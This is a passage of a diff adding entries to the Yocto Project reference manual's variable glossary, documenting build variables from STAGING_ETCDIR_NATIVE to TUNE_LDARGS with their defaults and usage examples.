+   :term:`STAGING_ETCDIR_NATIVE`
+      Specifies the path to the ``/etc`` subdirectory of the sysroot
+      directory for the build host.
+
+   :term:`STAGING_EXECPREFIXDIR`
+      Specifies the path to the ``/usr`` subdirectory of the sysroot
+      directory for the target for which the current recipe is being built
+      (:term:`STAGING_DIR_HOST`).
+
+   :term:`STAGING_INCDIR`
+      Specifies the path to the ``/usr/include`` subdirectory of the
+      sysroot directory for the target for which the current recipe being
+      built (:term:`STAGING_DIR_HOST`).
+
+   :term:`STAGING_INCDIR_NATIVE`
+      Specifies the path to the ``/usr/include`` subdirectory of the
+      sysroot directory for the build host.
+
+   :term:`STAGING_KERNEL_BUILDDIR`
+      Points to the directory containing the kernel build artifacts.
+      Recipes building software that needs to access kernel build artifacts
+      (e.g. ``systemtap-uprobes``) can look in the directory specified with
+      the ``STAGING_KERNEL_BUILDDIR`` variable to find these artifacts
+      after the kernel has been built.
+
+   :term:`STAGING_KERNEL_DIR`
+      The directory with kernel headers that are required to build
+      out-of-tree modules.
+
+   :term:`STAGING_LIBDIR`
+      Specifies the path to the ``/usr/lib`` subdirectory of the sysroot
+      directory for the target for which the current recipe is being built
+      (:term:`STAGING_DIR_HOST`).
+
+   :term:`STAGING_LIBDIR_NATIVE`
+      Specifies the path to the ``/usr/lib`` subdirectory of the sysroot
+      directory for the build host.
+
+   :term:`STAMP`
+      Specifies the base path used to create recipe stamp files. The path
+      to an actual stamp file is constructed by evaluating this string and
+      then appending additional information. Currently, the default
+      assignment for ``STAMP`` as set in the ``meta/conf/bitbake.conf``
+      file is:
+      ::
+
+         STAMP = "${STAMPS_DIR}/${MULTIMACH_TARGET_SYS}/${PN}/${EXTENDPE}${PV}-${PR}"
+
+      For information on how BitBake uses stamp files to determine if a
+      task should be rerun, see the
+      ":ref:`overview-manual/overview-manual-concepts:stamp files and the rerunning of tasks`"
+      section in the Yocto Project Overview and Concepts Manual.
+
+      See :term:`STAMPS_DIR`,
+      :term:`MULTIMACH_TARGET_SYS`,
+      :term:`PN`, :term:`EXTENDPE`,
+      :term:`PV`, and :term:`PR` for related variable
+      information.
+
+   :term:`STAMPS_DIR`
+      Specifies the base directory in which the OpenEmbedded build system
+      places stamps. The default directory is ``${TMPDIR}/stamps``.
+
+   :term:`STRIP`
+      The minimal command and arguments to run ``strip``, which is used to
+      strip symbols.
+
+   :term:`SUMMARY`
+      The short (72 characters or less) summary of the binary package for
+      packaging systems such as ``opkg``, ``rpm``, or ``dpkg``. By default,
+      ``SUMMARY`` is used to define the
+      :term:`DESCRIPTION` variable if ``DESCRIPTION`` is
+      not set in the recipe.
+
+   :term:`SVNDIR`
+      The directory in which files checked out of a Subversion system are
+      stored.
+
+   :term:`SYSLINUX_DEFAULT_CONSOLE`
+      Specifies the kernel boot default console. If you want to use a
+      console other than the default, set this variable in your recipe as
+      follows where "X" is the console number you want to use:
+      ::
+
+         SYSLINUX_DEFAULT_CONSOLE = "console=ttyX"
+
+      The :ref:`syslinux <ref-classes-syslinux>` class initially sets
+      this variable to null but then checks for a value later.
+
+   :term:`SYSLINUX_OPTS`
+      Lists additional options to add to the syslinux file. You need to set
+      this variable in your recipe. If you want to list multiple options,
+      separate the options with a semicolon character (``;``).
+
+      The :ref:`syslinux <ref-classes-syslinux>` class uses this variable
+      to create a set of options.
+
+   :term:`SYSLINUX_SERIAL`
+      Specifies the alternate serial port or turns it off. To turn off
+      serial, set this variable to an empty string in your recipe. The
+      variable's default value is set in the
+      :ref:`syslinux <ref-classes-syslinux>` class as follows:
+      ::
+
+         SYSLINUX_SERIAL ?= "0 115200"
+
+      The class checks for and uses the variable as needed.
+
+   :term:`SYSLINUX_SERIAL_TTY`
+      Specifies the alternate console=tty... kernel boot argument. The
+      variable's default value is set in the
+      :ref:`syslinux <ref-classes-syslinux>` class as follows:
+      ::
+
+         SYSLINUX_SERIAL_TTY ?= "console=ttyS0,115200"
+
+      The class checks for and uses the variable as needed.
+
+   :term:`SYSLINUX_SPLASH`
+      An ``.LSS`` file used as the background for the VGA boot menu when
+      you use the boot menu. You need to set this variable in your recipe.
+
+      The :ref:`syslinux <ref-classes-syslinux>` class checks for this
+      variable and if found, the OpenEmbedded build system installs the
+      splash screen.
+
+   :term:`SYSROOT_DESTDIR`
+      Points to the temporary directory under the work directory (default
+      "``${``\ :term:`WORKDIR`\ ``}/sysroot-destdir``")
+      where the files populated into the sysroot are assembled during the
+      :ref:`ref-tasks-populate_sysroot` task.
+
+   :term:`SYSROOT_DIRS`
+      Directories that are staged into the sysroot by the
+      :ref:`ref-tasks-populate_sysroot` task. By
+      default, the following directories are staged:
+      ::
+
+         SYSROOT_DIRS = " \
+             ${includedir} \
+             ${libdir} \
+             ${base_libdir} \
+             ${nonarch_base_libdir} \
+             ${datadir} \
+             "
+
+   :term:`SYSROOT_DIRS_BLACKLIST`
+      Directories that are not staged into the sysroot by the
+      :ref:`ref-tasks-populate_sysroot` task. You
+      can use this variable to exclude certain subdirectories of
+      directories listed in :term:`SYSROOT_DIRS` from
+      staging. By default, the following directories are not staged:
+      ::
+
+         SYSROOT_DIRS_BLACKLIST = " \
+             ${mandir} \
+             ${docdir} \
+             ${infodir} \
+             ${datadir}/locale \
+             ${datadir}/applications \
+             ${datadir}/fonts \
+             ${datadir}/pixmaps \
+             "
+
+   :term:`SYSROOT_DIRS_NATIVE`
+      Extra directories staged into the sysroot by the
+      :ref:`ref-tasks-populate_sysroot` task for
+      ``-native`` recipes, in addition to those specified in
+      :term:`SYSROOT_DIRS`. By default, the following
+      extra directories are staged:
+      ::
+
+         SYSROOT_DIRS_NATIVE = " \
+             ${bindir} \
+             ${sbindir} \
+             ${base_bindir} \
+             ${base_sbindir} \
+             ${libexecdir} \
+             ${sysconfdir} \
+             ${localstatedir} \
+             "
+
+      .. note::
+
+         Programs built by ``-native`` recipes run directly from the sysroot
+         (:term:`STAGING_DIR_NATIVE`), which is why additional directories
+         containing program executables and supporting files need to be staged.
+
+   :term:`SYSROOT_PREPROCESS_FUNCS`
+      A list of functions to execute after files are staged into the
+      sysroot. These functions are usually used to apply additional
+      processing on the staged files, or to stage additional files.
+
+   :term:`SYSTEMD_AUTO_ENABLE`
+      When inheriting the :ref:`systemd <ref-classes-systemd>` class,
+      this variable specifies whether the specified service in
+      :term:`SYSTEMD_SERVICE` should start
+      automatically or not. By default, the service is enabled to
+      automatically start at boot time. The default setting is in the
+      :ref:`systemd <ref-classes-systemd>` class as follows:
+      ::
+
+         SYSTEMD_AUTO_ENABLE ??= "enable"
+
+      You can disable the service by setting the variable to "disable".
+
+   :term:`SYSTEMD_BOOT_CFG`
+      When :term:`EFI_PROVIDER` is set to
+      "systemd-boot", the ``SYSTEMD_BOOT_CFG`` variable specifies the
+      configuration file that should be used. By default, the
+      :ref:`systemd-boot <ref-classes-systemd-boot>` class sets the
+      ``SYSTEMD_BOOT_CFG`` as follows:
+      ::
+
+         SYSTEMD_BOOT_CFG ?= "${S}/loader.conf"
+
+      For information on Systemd-boot, see the `Systemd-boot
+      documentation <http://www.freedesktop.org/wiki/Software/systemd/systemd-boot/>`__.
+
+   :term:`SYSTEMD_BOOT_ENTRIES`
+      When :term:`EFI_PROVIDER` is set to
+      "systemd-boot", the ``SYSTEMD_BOOT_ENTRIES`` variable specifies a
+      list of entry files (``*.conf``) to install that contain one boot
+      entry per file. By default, the
+      :ref:`systemd-boot <ref-classes-systemd-boot>` class sets the
+      ``SYSTEMD_BOOT_ENTRIES`` as follows:
+      ::
+
+          SYSTEMD_BOOT_ENTRIES ?= ""
+
+      For information on Systemd-boot, see the `Systemd-boot
+      documentation <http://www.freedesktop.org/wiki/Software/systemd/systemd-boot/>`__.
+
+   :term:`SYSTEMD_BOOT_TIMEOUT`
+      When :term:`EFI_PROVIDER` is set to
+      "systemd-boot", the ``SYSTEMD_BOOT_TIMEOUT`` variable specifies the
+      boot menu timeout in seconds. By default, the
+      :ref:`systemd-boot <ref-classes-systemd-boot>` class sets the
+      ``SYSTEMD_BOOT_TIMEOUT`` as follows:
+      ::
+
+         SYSTEMD_BOOT_TIMEOUT ?= "10"
+
+      For information on Systemd-boot, see the `Systemd-boot
+      documentation <http://www.freedesktop.org/wiki/Software/systemd/systemd-boot/>`__.
+
+   :term:`SYSTEMD_PACKAGES`
+      When inheriting the :ref:`systemd <ref-classes-systemd>` class,
+      this variable locates the systemd unit files when they are not found
+      in the main recipe's package. By default, the ``SYSTEMD_PACKAGES``
+      variable is set such that the systemd unit files are assumed to
+      reside in the recipes main package:
+      ::
+
+         SYSTEMD_PACKAGES ?= "${PN}"
+
+      If these unit files are not in this recipe's main package, you need
+      to use ``SYSTEMD_PACKAGES`` to list the package or packages in which
+      the build system can find the systemd unit files.
+
+   :term:`SYSTEMD_SERVICE`
+      When inheriting the :ref:`systemd <ref-classes-systemd>` class,
+      this variable specifies the systemd service name for a package.
+
+      When you specify this file in your recipe, use a package name
+      override to indicate the package to which the value applies. Here is
+      an example from the connman recipe:
+      ::
+
+         SYSTEMD_SERVICE_${PN} = "connman.service"
+
+   :term:`SYSVINIT_ENABLED_GETTYS`
+      When using
+      :ref:`SysVinit <dev-manual/dev-manual-common-tasks:enabling system services>`,
+      specifies a space-separated list of the virtual terminals that should
+      run a `getty <http://en.wikipedia.org/wiki/Getty_%28Unix%29>`__
+      (allowing login), assuming :term:`USE_VT` is not set to
+      "0".
+
+      The default value for ``SYSVINIT_ENABLED_GETTYS`` is "1" (i.e. only
+      run a getty on the first virtual terminal).
+
+   :term:`T`
+      This variable points to a directory were BitBake places temporary
+      files, which consist mostly of task logs and scripts, when building a
+      particular recipe. The variable is typically set as follows:
+      ::
+
+         T = "${WORKDIR}/temp"
+
+      The :term:`WORKDIR` is the directory into which
+      BitBake unpacks and builds the recipe. The default ``bitbake.conf``
+      file sets this variable.
+
+      The ``T`` variable is not to be confused with the
+      :term:`TMPDIR` variable, which points to the root of
+      the directory tree where BitBake places the output of an entire
+      build.
+
+   :term:`TARGET_ARCH`
+      The target machine's architecture. The OpenEmbedded build system
+      supports many architectures. Here is an example list of architectures
+      supported. This list is by no means complete as the architecture is
+      configurable:
+
+      - arm
+      - i586
+      - x86_64
+      - powerpc
+      - powerpc64
+      - mips
+      - mipsel
+
+      For additional information on machine architectures, see the
+      :term:`TUNE_ARCH` variable.
+
+   :term:`TARGET_AS_ARCH`
+      Specifies architecture-specific assembler flags for the target
+      system. ``TARGET_AS_ARCH`` is initialized from
+      :term:`TUNE_ASARGS` by default in the BitBake
+      configuration file (``meta/conf/bitbake.conf``):
+      ::
+
+         TARGET_AS_ARCH = "${TUNE_ASARGS}"
+
+   :term:`TARGET_CC_ARCH`
+      Specifies architecture-specific C compiler flags for the target
+      system. ``TARGET_CC_ARCH`` is initialized from
+      :term:`TUNE_CCARGS` by default.
+
+      .. note::
+
+         It is a common workaround to append :term:`LDFLAGS` to
+         ``TARGET_CC_ARCH`` in recipes that build software for the target that
+         would not otherwise respect the exported ``LDFLAGS`` variable.
+
+   :term:`TARGET_CC_KERNEL_ARCH`
+      This is a specific kernel compiler flag for a CPU or Application
+      Binary Interface (ABI) tune. The flag is used rarely and only for
+      cases where a userspace :term:`TUNE_CCARGS` is not
+      compatible with the kernel compilation. The ``TARGET_CC_KERNEL_ARCH``
+      variable allows the kernel (and associated modules) to use a
+      different configuration. See the
+      ``meta/conf/machine/include/arm/feature-arm-thumb.inc`` file in the
+      :term:`Source Directory` for an example.
+
+   :term:`TARGET_CFLAGS`
+      Specifies the flags to pass to the C compiler when building for the
+      target. When building in the target context,
+      :term:`CFLAGS` is set to the value of this variable by
+      default.
+
+      Additionally, the SDK's environment setup script sets the ``CFLAGS``
+      variable in the environment to the ``TARGET_CFLAGS`` value so that
+      executables built using the SDK also have the flags applied.
+
+   :term:`TARGET_CPPFLAGS`
+      Specifies the flags to pass to the C pre-processor (i.e. to both the
+      C and the C++ compilers) when building for the target. When building
+      in the target context, :term:`CPPFLAGS` is set to the
+      value of this variable by default.
+
+      Additionally, the SDK's environment setup script sets the
+      ``CPPFLAGS`` variable in the environment to the ``TARGET_CPPFLAGS``
+      value so that executables built using the SDK also have the flags
+      applied.
+
+   :term:`TARGET_CXXFLAGS`
+      Specifies the flags to pass to the C++ compiler when building for the
+      target. When building in the target context,
+      :term:`CXXFLAGS` is set to the value of this variable
+      by default.
+
+      Additionally, the SDK's environment setup script sets the
+      ``CXXFLAGS`` variable in the environment to the ``TARGET_CXXFLAGS``
+      value so that executables built using the SDK also have the flags
+      applied.
+
+   :term:`TARGET_FPU`
+      Specifies the method for handling FPU code. For FPU-less targets,
+      which include most ARM CPUs, the variable must be set to "soft". If
+      not, the kernel emulation gets used, which results in a performance
+      penalty.
+
+   :term:`TARGET_LD_ARCH`
+      Specifies architecture-specific linker flags for the target system.
+      ``TARGET_LD_ARCH`` is initialized from
+      :term:`TUNE_LDARGS` by default in the BitBake
+      configuration file (``meta/conf/bitbake.conf``):
+      ::
+
+         TARGET_LD_ARCH = "${TUNE_LDARGS}"
+
+   :term:`TARGET_LDFLAGS`
+      Specifies the flags to pass to the linker when building for the
+      target. When building in the target context,
+      :term:`LDFLAGS` is set to the value of this variable
+      by default.
+
+      Additionally, the SDK's environment setup script sets the
+      :term:`LDFLAGS` variable in the environment to the
+      ``TARGET_LDFLAGS`` value so that executables built using the SDK also
+      have the flags applied.
+
+   :term:`TARGET_OS`
+      Specifies the target's operating system. The variable can be set to
+      "linux" for glibc-based systems (GNU C Library) and to "linux-musl"
+      for musl libc. For ARM/EABI targets, "linux-gnueabi" and
+      "linux-musleabi" possible values exist.
+
+   :term:`TARGET_PREFIX`
+      Specifies the prefix used for the toolchain binary target tools.
+
+      Depending on the type of recipe and the build target,
+      ``TARGET_PREFIX`` is set as follows:
+
+      -  For recipes building for the target machine, the value is
+         "${:term:`TARGET_SYS`}-".
+
+      -  For native recipes, the build system sets the variable to the
+         value of ``BUILD_PREFIX``.
+
+      -  For native SDK recipes (``nativesdk``), the build system sets the
+         variable to the value of ``SDK_PREFIX``.
+
+   :term:`TARGET_SYS`
+      Specifies the system, including the architecture and the operating
+      system, for which the build is occurring in the context of the
+      current recipe.
+
+      The OpenEmbedded build system automatically sets this variable based
+      on :term:`TARGET_ARCH`,
+      :term:`TARGET_VENDOR`, and
+      :term:`TARGET_OS` variables.
+
+      .. note::
+
+         You do not need to set the ``TARGET_SYS`` variable yourself.
+
+      Consider these two examples:
+
+      -  Given a native recipe on a 32-bit, x86 machine running Linux, the
+         value is "i686-linux".
+
+      -  Given a recipe being built for a little-endian, MIPS target
+         running Linux, the value might be "mipsel-linux".
+
+   :term:`TARGET_VENDOR`
+      Specifies the name of the target vendor.
+
+   :term:`TCLIBC`
+      Specifies the GNU standard C library (``libc``) variant to use during
+      the build process. This variable replaces ``POKYLIBC``, which is no
+      longer supported.
+
+      You can select "glibc", "musl", "newlib", or "baremetal"
+
+   :term:`TCLIBCAPPEND`
+      Specifies a suffix to be appended onto the
+      :term:`TMPDIR` value. The suffix identifies the
+      ``libc`` variant for building. When you are building for multiple
+      variants with the same :term:`Build Directory`, this
+      mechanism ensures that output for different ``libc`` variants is kept
+      separate to avoid potential conflicts.
+
+      In the ``defaultsetup.conf`` file, the default value of
+      ``TCLIBCAPPEND`` is "-${TCLIBC}". However, distros such as poky,
+      which normally only support one ``libc`` variant, set
+      ``TCLIBCAPPEND`` to "" in their distro configuration file resulting
+      in no suffix being applied.
+
+   :term:`TCMODE`
+      Specifies the toolchain selector. ``TCMODE`` controls the
+      characteristics of the generated packages and images by telling the
+      OpenEmbedded build system which toolchain profile to use. By default,
+      the OpenEmbedded build system builds its own internal toolchain. The
+      variable's default value is "default", which uses that internal
+      toolchain.
+
+      .. note::
+
+         If ``TCMODE`` is set to a value other than "default", then it is your
+         responsibility to ensure that the toolchain is compatible with the
+         default toolchain. Using older or newer versions of these
+         components might cause build problems. See the Release Notes for
+         the Yocto Project release for the specific components with which
+         the toolchain must be compatible. To access the Release Notes, go
+         to the :yocto_home:`Downloads </software-overview/downloads>`
+         page on the Yocto Project website and click on the "RELEASE
+         INFORMATION" link for the appropriate release.
+
+      The ``TCMODE`` variable is similar to :term:`TCLIBC`,
+      which controls the variant of the GNU standard C library (``libc``)
+      used during the build process: ``glibc`` or ``musl``.
+
+      With additional layers, it is possible to use a pre-compiled external
+      toolchain. One example is the Sourcery G++ Toolchain. The support for
+      this toolchain resides in the separate Mentor Graphics
+      ``meta-sourcery`` layer at
+      http://github.com/MentorEmbedded/meta-sourcery/.
+
+      The layer's ``README`` file contains information on how to use the
+      Sourcery G++ Toolchain as an external toolchain. In summary, you must
+      be sure to add the layer to your ``bblayers.conf`` file in front of
+      the ``meta`` layer and then set the ``EXTERNAL_TOOLCHAIN`` variable
+      in your ``local.conf`` file to the location in which you installed
+      the toolchain.
+
+      The fundamentals used for this example apply to any external
+      toolchain. You can use ``meta-sourcery`` as a template for adding
+      support for other external toolchains.
+
+   :term:`TEST_EXPORT_DIR`
+      The location the OpenEmbedded build system uses to export tests when
+      the :term:`TEST_EXPORT_ONLY` variable is set
+      to "1".
+
+      The ``TEST_EXPORT_DIR`` variable defaults to
+      ``"${TMPDIR}/testimage/${PN}"``.
+
+   :term:`TEST_EXPORT_ONLY`
+      Specifies to export the tests only. Set this variable to "1" if you
+      do not want to run the tests but you want them to be exported in a
+      manner that you to run them outside of the build system.
+
+   :term:`TEST_LOG_DIR`
+      Holds the SSH log and the boot log for QEMU machines. The
+      ``TEST_LOG_DIR`` variable defaults to ``"${WORKDIR}/testimage"``.
+
+      .. note::
+
+         Actual test results reside in the task log (``log.do_testimage``),
+         which is in the ``${WORKDIR}/temp/`` directory.
+
+   :term:`TEST_POWERCONTROL_CMD`
+      For automated hardware testing, specifies the command to use to
+      control the power of the target machine under test. Typically, this
+      command would point to a script that performs the appropriate action
+      (e.g. interacting with a web-enabled power strip). The specified
+      command should expect to receive as the last argument "off", "on" or
+      "cycle" specifying to power off, on, or cycle (power off and then
+      power on) the device, respectively.
+
+   :term:`TEST_POWERCONTROL_EXTRA_ARGS`
+      For automated hardware testing, specifies additional arguments to
+      pass through to the command specified in
+      :term:`TEST_POWERCONTROL_CMD`. Setting
+      ``TEST_POWERCONTROL_EXTRA_ARGS`` is optional. You can use it if you
+      wish, for example, to separate the machine-specific and
+      non-machine-specific parts of the arguments.
+
+   :term:`TEST_QEMUBOOT_TIMEOUT`
+      The time in seconds allowed for an image to boot before automated
+      runtime tests begin to run against an image. The default timeout
+      period to allow the boot process to reach the login prompt is 500
+      seconds. You can specify a different value in the ``local.conf``
+      file.
+
+      For more information on testing images, see the
+      ":ref:`dev-manual/dev-manual-common-tasks:performing automated runtime testing`"
+      section in the Yocto Project Development Tasks Manual.
+
+   :term:`TEST_SERIALCONTROL_CMD`
+      For automated hardware testing, specifies the command to use to
+      connect to the serial console of the target machine under test. This
+      command simply needs to connect to the serial console and forward
+      that connection to standard input and output as any normal terminal
+      program does.
+
+      For example, to use the Picocom terminal program on serial device
+      ``/dev/ttyUSB0`` at 115200bps, you would set the variable as follows:
+      ::
+
+         TEST_SERIALCONTROL_CMD = "picocom /dev/ttyUSB0 -b 115200"
+
+   :term:`TEST_SERIALCONTROL_EXTRA_ARGS`
+      For automated hardware testing, specifies additional arguments to
+      pass through to the command specified in
+      :term:`TEST_SERIALCONTROL_CMD`. Setting
+      ``TEST_SERIALCONTROL_EXTRA_ARGS`` is optional. You can use it if you
+      wish, for example, to separate the machine-specific and
+      non-machine-specific parts of the command.
+
+   :term:`TEST_SERVER_IP`
+      The IP address of the build machine (host machine). This IP address
+      is usually automatically detected. However, if detection fails, this
+      variable needs to be set to the IP address of the build machine (i.e.
+      where the build is taking place).
+
+      .. note::
+
+         The ``TEST_SERVER_IP`` variable is only used for a small number of
+         tests such as the "dnf" test suite, which needs to download packages
+         from ``WORKDIR/oe-rootfs-repo``.
+
+   :term:`TEST_SUITES`
+      An ordered list of tests (modules) to run against an image when
+      performing automated runtime testing.
+
+      The OpenEmbedded build system provides a core set of tests that can
+      be used against images.
+
+      .. note::
+
+         Currently, there is only support for running these tests under
+         QEMU.
+
+      Tests include ``ping``, ``ssh``, ``df`` among others. You can add
+      your own tests to the list of tests by appending ``TEST_SUITES`` as
+      follows:
+      ::
+
+         TEST_SUITES_append = " mytest"
+
+      Alternatively, you can
+      provide the "auto" option to have all applicable tests run against
+      the image.
+      ::
+
+         TEST_SUITES_append = " auto"
+
+      Using this option causes the
+      build system to automatically run tests that are applicable to the
+      image. Tests that are not applicable are skipped.
+
+      The order in which tests are run is important. Tests that depend on
+      another test must appear later in the list than the test on which
+      they depend. For example, if you append the list of tests with two
+      tests (``test_A`` and ``test_B``) where ``test_B`` is dependent on
+      ``test_A``, then you must order the tests as follows:
+      ::
+
+         TEST_SUITES = "test_A test_B"
+
+      For more information on testing images, see the
+      ":ref:`dev-manual/dev-manual-common-tasks:performing automated runtime testing`"
+      section in the Yocto Project Development Tasks Manual.
+
+   :term:`TEST_TARGET`
+      Specifies the target controller to use when running tests against a
+      test image. The default controller to use is "qemu":
+      ::
+
+         TEST_TARGET = "qemu"
+
+      A target controller is a class that defines how an image gets
+      deployed on a target and how a target is started. A layer can extend
+      the controllers by adding a module in the layer's
+      ``/lib/oeqa/controllers`` directory and by inheriting the
+      ``BaseTarget`` class, which is an abstract class that cannot be used
+      as a value of ``TEST_TARGET``.
+
+      You can provide the following arguments with ``TEST_TARGET``:
+
+      -  *"qemu":* Boots a QEMU image and runs the tests. See the
+         ":ref:`qemu-image-enabling-tests`" section
+         in the Yocto Project Development Tasks Manual for more
+         information.
+
+      -  *"simpleremote":* Runs the tests on target hardware that is
+         already up and running. The hardware can be on the network or it
+         can be a device running an image on QEMU. You must also set
+         :term:`TEST_TARGET_IP` when you use
+         "simpleremote".
+
+         .. note::
+
+            This argument is defined in
+            ``meta/lib/oeqa/controllers/simpleremote.py``.
+
+      For information on running tests on hardware, see the
+      ":ref:`hardware-image-enabling-tests`"
+      section in the Yocto Project Development Tasks Manual.
+
+   :term:`TEST_TARGET_IP`
+      The IP address of your hardware under test. The ``TEST_TARGET_IP``
+      variable has no effect when :term:`TEST_TARGET` is
+      set to "qemu".
+
+      When you specify the IP address, you can also include a port. Here is
+      an example:
+      ::
+
+         TEST_TARGET_IP = "192.168.1.4:2201"
+
+      Specifying a port is
+      useful when SSH is started on a non-standard port or in cases when
+      your hardware under test is behind a firewall or network that is not
+      directly accessible from your host and you need to do port address
+      translation.
+
+   :term:`TESTIMAGE_AUTO`
+      Automatically runs the series of automated tests for images when an
+      image is successfully built. Setting ``TESTIMAGE_AUTO`` to "1" causes
+      any image that successfully builds to automatically boot under QEMU.
+      Using the variable also adds in dependencies so that any SDK for
+      which testing is requested is automatically built first.
+
+      These tests are written in Python making use of the ``unittest``
+      module, and the majority of them run commands on the target system
+      over ``ssh``. You can set this variable to "1" in your ``local.conf``
+      file in the :term:`Build Directory` to have the
+      OpenEmbedded build system automatically run these tests after an
+      image successfully builds:
+
+         TESTIMAGE_AUTO = "1"
+
+      For more information
+      on enabling, running, and writing these tests, see the
+      ":ref:`dev-manual/dev-manual-common-tasks:performing automated runtime testing`"
+      section in the Yocto Project Development Tasks Manual and the
+      ":ref:`testimage*.bbclass <ref-classes-testimage*>`" section.
+
+   :term:`THISDIR`
+      The directory in which the file BitBake is currently parsing is
+      located. Do not manually set this variable.
+
+   :term:`TIME`
+      The time the build was started. Times appear using the hour, minute,
+      and second (HMS) format (e.g. "140159" for one minute and fifty-nine
+      seconds past 1400 hours).
+
+   :term:`TMPDIR`
+      This variable is the base directory the OpenEmbedded build system
+      uses for all build output and intermediate files (other than the
+      shared state cache). By default, the ``TMPDIR`` variable points to
+      ``tmp`` within the :term:`Build Directory`.
+
+      If you want to establish this directory in a location other than the
+      default, you can uncomment and edit the following statement in the
+      ``conf/local.conf`` file in the :term:`Source Directory`:
+      ::
+
+         #TMPDIR = "${TOPDIR}/tmp"
+
+      An example use for this scenario is to set ``TMPDIR`` to a local disk,
+      which does not use NFS, while having the Build Directory use NFS.
+
+      The filesystem used by ``TMPDIR`` must have standard filesystem
+      semantics (i.e. mixed-case files are unique, POSIX file locking, and
+      persistent inodes). Due to various issues with NFS and bugs in some
+      implementations, NFS does not meet this minimum requirement.
+      Consequently, ``TMPDIR`` cannot be on NFS.
+
+   :term:`TOOLCHAIN_HOST_TASK`
+      This variable lists packages the OpenEmbedded build system uses when
+      building an SDK, which contains a cross-development environment. The
+      packages specified by this variable are part of the toolchain set
+      that runs on the :term:`SDKMACHINE`, and each
+      package should usually have the prefix ``nativesdk-``. For example,
+      consider the following command when building an SDK:
+      ::
+
+         $ bitbake -c populate_sdk imagename
+
+      In this case, a default list of packages is
+      set in this variable, but you can add additional packages to the
+      list. See the
+      ":ref:`sdk-manual/sdk-appendix-customizing-standard:adding individual packages to the standard sdk`" section
+      in the Yocto Project Application Development and the Extensible
+      Software Development Kit (eSDK) manual for more information.
+
+      For background information on cross-development toolchains in the
+      Yocto Project development environment, see the
+      ":ref:`sdk-manual/sdk-intro:the cross-development toolchain`"
+      section in the Yocto Project Overview and Concepts Manual. For
+      information on setting up a cross-development environment, see the
+      :doc:`../sdk-manual/sdk-manual` manual.
+
+   :term:`TOOLCHAIN_OUTPUTNAME`
+      This variable defines the name used for the toolchain output. The
+      :ref:`populate_sdk_base <ref-classes-populate-sdk-*>` class sets
+      the ``TOOLCHAIN_OUTPUTNAME`` variable as follows:
+      ::
+
+         TOOLCHAIN_OUTPUTNAME ?= "${SDK_NAME}-toolchain-${SDK_VERSION}"
+
+      See
+      the :term:`SDK_NAME` and
+      :term:`SDK_VERSION` variables for additional
+      information.
+
+   :term:`TOOLCHAIN_TARGET_TASK`
+      This variable lists packages the OpenEmbedded build system uses when
+      it creates the target part of an SDK (i.e. the part built for the
+      target hardware), which includes libraries and headers. Use this
+      variable to add individual packages to the part of the SDK that runs
+      on the target. See the
+      ":ref:`sdk-manual/sdk-appendix-customizing-standard:adding individual packages to the standard sdk`" section
+      in the Yocto Project Application Development and the Extensible
+      Software Development Kit (eSDK) manual for more information.
+
+      For background information on cross-development toolchains in the
+      Yocto Project development environment, see the
+      ":ref:`sdk-manual/sdk-intro:the cross-development toolchain`"
+      section in the Yocto Project Overview and Concepts Manual. For
+      information on setting up a cross-development environment, see the
+      :doc:`../sdk-manual/sdk-manual` manual.
+
+   :term:`TOPDIR`
+      The top-level :term:`Build Directory`. BitBake
+      automatically sets this variable when you initialize your build
+      environment using :ref:`structure-core-script`.
+
+   :term:`TRANSLATED_TARGET_ARCH`
+      A sanitized version of :term:`TARGET_ARCH`. This
+      variable is used where the architecture is needed in a value where
+      underscores are not allowed, for example within package filenames. In
+      this case, dash characters replace any underscore characters used in
+      ``TARGET_ARCH``.
+
+      Do not edit this variable.
+
+   :term:`TUNE_ARCH`
+      The GNU canonical architecture for a specific architecture (i.e.
+      ``arm``, ``armeb``, ``mips``, ``mips64``, and so forth). BitBake uses
+      this value to setup configuration.
+
+      ``TUNE_ARCH`` definitions are specific to a given architecture. The
+      definitions can be a single static definition, or can be dynamically
+      adjusted. You can see details for a given CPU family by looking at
+      the architecture's ``README`` file. For example, the
+      ``meta/conf/machine/include/mips/README`` file in the
+      :term:`Source Directory` provides information for
+      ``TUNE_ARCH`` specific to the ``mips`` architecture.
+
+      ``TUNE_ARCH`` is tied closely to
+      :term:`TARGET_ARCH`, which defines the target
+      machine's architecture. The BitBake configuration file
+      (``meta/conf/bitbake.conf``) sets ``TARGET_ARCH`` as follows:
+      ::
+
+         TARGET_ARCH = "${TUNE_ARCH}"
+
+      The following list, which is by no means complete since architectures
+      are configurable, shows supported machine architectures:
+
+      - arm
+      - i586
+      - x86_64
+      - powerpc
+      - powerpc64
+      - mips
+      - mipsel
+
+   :term:`TUNE_ASARGS`
+      Specifies architecture-specific assembler flags for the target
+      system. The set of flags is based on the selected tune features.
+      ``TUNE_ASARGS`` is set using the tune include files, which are
+      typically under ``meta/conf/machine/include/`` and are influenced
+      through :term:`TUNE_FEATURES`. For example, the
+      ``meta/conf/machine/include/x86/arch-x86.inc`` file defines the flags
+      for the x86 architecture as follows:
+      ::
+
+         TUNE_ASARGS += "${@bb.utils.contains("TUNE_FEATURES", "mx32", "-x32", "", d)}"
+
+      .. note::
+
+         Board Support Packages (BSPs) select the tune. The selected tune,
+         in turn, affects the tune variables themselves (i.e. the tune can
+         supply its own set of flags).
+
+   :term:`TUNE_CCARGS`
+      Specifies architecture-specific C compiler flags for the target
+      system. The set of flags is based on the selected tune features.
+      ``TUNE_CCARGS`` is set using the tune include files, which are
+      typically under ``meta/conf/machine/include/`` and are influenced
+      through :term:`TUNE_FEATURES`.
+
+      .. note::
+
+         Board Support Packages (BSPs) select the tune. The selected tune,
+         in turn, affects the tune variables themselves (i.e. the tune can
+         supply its own set of flags).
+
+   :term:`TUNE_FEATURES`
+      Features used to "tune" a compiler for optimal use given a specific
+      processor. The features are defined within the tune files and allow
+      arguments (i.e. ``TUNE_*ARGS``) to be dynamically generated based on
+      the features.
+
+      The OpenEmbedded build system verifies the features to be sure they
+      are not conflicting and that they are supported.
+
+      The BitBake configuration file (``meta/conf/bitbake.conf``) defines
+      ``TUNE_FEATURES`` as follows:
+      ::
+
+         TUNE_FEATURES ??= "${TUNE_FEATURES_tune-${DEFAULTTUNE}}"
+
+      See the :term:`DEFAULTTUNE` variable for more information.
+
+   :term:`TUNE_LDARGS`
+      Specifies architecture-specific linker flags for the target system.
+      The set of flags is based on the selected tune features.
+      ``TUNE_LDARGS`` is set using the tune include files, which are
+      typically under ``meta/conf/machine/include/`` and are influenced
+      through :term:`TUNE_FEATURES`. For example, the
